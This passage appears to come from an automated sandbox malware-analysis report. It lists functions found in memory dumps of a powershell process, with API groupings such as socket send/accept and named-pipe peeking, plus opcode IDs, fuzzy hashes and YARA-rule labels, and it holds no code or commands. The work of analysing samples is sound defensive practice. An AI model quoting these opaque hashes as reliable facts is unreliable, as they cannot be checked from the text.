                                                    • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                    • Instruction Fuzzy Hash: EF2191B6600B94A2EF00CFD1F28865977A8F748B94F164255EE5A4BFA1DE38C4419740
                                                    Function 0000022EF9B104D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: clock
                                                    • String ID:
                                                    • API String ID: 3195780754-0
                                                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction ID: fd9c4c22eb0981f060e3e968f0bdb28e33bf87b6dd6ee0843eeabaec687d79c6
                                                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction Fuzzy Hash: 59113622200785B5FB71DEE666E462BB690BBA4794F1B0021EEC443A41EA30C8C59F08
                                                    Function 0000022EF9B3E9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                    • String ID:
                                                    • API String ID: 4151157258-0
                                                    • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                    • Instruction ID: b0c296d30841a032d0cd8526e155cd184a4332c4d8563f9ecd0b839f38861c0f
                                                    • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                    • Instruction Fuzzy Hash: 1B212B523181A872FF72D6919278B7D66D0F360BD5F1E5122E6D707EC5CA2CC541E704
                                                    Function 0000022EFA0DF5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                    • String ID:
                                                    • API String ID: 4151157258-0
                                                    • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                    • Instruction ID: 8533cffe12fbf95590c34e5b25f1008a51740afa720ada8913a700472f7f0759
                                                    • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                    • Instruction Fuzzy Hash: 0221D5636042A061EF605F91B25833D66D0E74CBD8F1EC129AA964FFF5CE6CC541A720
                                                    Function 0000022EFA0B10D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: clock
                                                    • String ID:
                                                    • API String ID: 3195780754-0
                                                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction ID: 3b3f3c4d8ea017e1780e07cc20d37dc7781a34f354c83ac325aeae6d01262311
                                                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction Fuzzy Hash: 1C11232210074465EBB09EE27B5462BB690BB8C3D8F1B1431EE549BF75E978C8829700
                                                    Function 0000022EFA0CEF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$closesocketsend$accept
                                                    • String ID:
                                                    • API String ID: 47150829-0
                                                    • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                    • Instruction ID: 60084b4c31e5ad72dcf6c29c91dec248483ef9138c906e8b35dd12aaf82c427a
                                                    • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                    • Instruction Fuzzy Hash: 3B01B525700A4191EF549BB2FBA97292361E74DFF4F169211DE160BFA5CE3CC481AB40
                                                    Function 0000022EFA0C53EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$NamedPeekPipeSleep
                                                    • String ID:
                                                    • API String ID: 1593283408-0
                                                    • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                    • Instruction ID: 6c1b3d0a38791a7e4398d6d3df7a2473ca1a45ea165954236b94c028ad678beb
                                                    • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                    • Instruction Fuzzy Hash: 3E01F931254A51E2FF2087A5F94830AA3A5F78C785F664024DB484AFB4DF3CC481A705
                                                    Function 0000022EFA0C48D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$NamedPeekPipeSleep
                                                    • String ID:
                                                    • API String ID: 1593283408-0
                                                    • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                    • Instruction ID: 2a332c145e38857ca8ab3558dafbff62a9569a15230861fb2fdd3e3f7b157a26
                                                    • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                    • Instruction Fuzzy Hash: BA01F432614A51A3FF208B94F98C31AB7A0F78DB84F264124DB850AF74DF3DC885AB04
                                                    Function 0000022EFA0CF098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                    • String ID:
                                                    • API String ID: 1525665891-0
                                                    • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                    • Instruction ID: 4fa8c5f3177b9651157d5b152fb603a92cfb11bd240b64e121b028540bf6a9f5
                                                    • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                    • Instruction Fuzzy Hash: D5E0172661064491EF14EBF2EAAA16C1720E78CF84F1600219E0E4FFB2DD6CC891E315
                                                    Function 0000022EF9B2EC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 1812809483-1255198513
                                                    • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                    • Instruction ID: 89d9bdfb164cf206a4fc4dbbb4063fe3725b266b5942c6cc5c2d5c8ccad90489
                                                    • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                    • Instruction Fuzzy Hash: 381121B2310A4082EB21DB82D55839DB364F7A8FE0F594324EF9807B95CF38C140CB04
                                                    Function 0000022EFA0CF860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 1812809483-1255198513
                                                    • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                    • Instruction ID: 193183a288c2d08820c55988fd9ae50ad964f3534d2b4183a044184fd1f0c95a
                                                    • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                    • Instruction Fuzzy Hash: 09118E72610B4096EB109F92E548399B660FB9CFE4FA54321AB580BFA9CF3CC245CB10
                                                    Function 0000022EF9B110C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_calloc_implcalloc
                                                    • String ID:
                                                    • API String ID: 4000150058-0
                                                    • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                    • Instruction ID: ee8c7e72a26c50cbf42111559f05c7132089375dda31e8beb0561d72ac1d93d4
                                                    • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                    • Instruction Fuzzy Hash: AFC11B32604B849AEB74CF95E99439E77A4F398B84F11412AEBCD83F58DB38C455DB04
                                                    Function 0000022EFA0B1CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_calloc_implcalloc
                                                    • String ID:
                                                    • API String ID: 4000150058-0
                                                    • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                    • Instruction ID: 7825ba1b124b43eae1cad69ebc6b7316006818b36ceb642d9e1aedd9a16bcc95
                                                    • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                    • Instruction Fuzzy Hash: D9C10A32604B849AEB60CFA5F59439E77A4F78C788F11412AEB8D87F68DB38C555DB00
                                                    Function 0000022EF9B2A144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                    • Instruction ID: 0403b11d21a059522ad573653460cfe9ef32f19ccc8328f67706363cfb976396
                                                    • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                    • Instruction Fuzzy Hash: 7A510521300245B1FF7AABA297783AD6391F7A0BD0F5645259ACA1BFC6DF79C401E708
                                                    Function 0000022EFA0CAD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 3531731211-0
                                                    • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                    • Instruction ID: d6da2e677b5833ab2f6919ff022785947f51de375c1a03388c73eab611092373
                                                    • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                    • Instruction Fuzzy Hash: 2B51C37121034561EE18AFE1B6583AD6352FB88B90F160435AE0A5FFB6EF7CC452A700
                                                    Function 0000022EF9B13700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                    • Instruction ID: ef99cc89f34223f0fc2bc2b7baf2e4f5dbfa503bcf6769c25ea9db8cc0cc61ae
                                                    • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                    • Instruction Fuzzy Hash: 3041F162700780A7EF69DFA6A62876D73A0F360B84F024425DE9A47F85FF34D885D708
                                                    Function 0000022EFA0B4300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                    • Instruction ID: 03e50fc3d36ceff1f0bf6f5ba1b27bb93c985bb73962e570b6684c5f7c9c34d6
                                                    • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                    • Instruction Fuzzy Hash: 5A419222200780A7EF54DBA6B62869D63A0B788BC4F464424DE5B8BF95DF39D915D700
                                                    Function 0000022EFA0C1038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CurrentProcessfreemalloc
                                                    • String ID:
                                                    • API String ID: 1397824077-0
                                                    • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                    • Instruction ID: e7b0229662e024e460fd1346b8923d1d6833349157ba6d23355c7858fc4f7d72
                                                    • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                    • Instruction Fuzzy Hash: BB419672714641A6EF60DBA2F6447AE6391EB8C7C8F025415AF894BFE6EF7CC1419700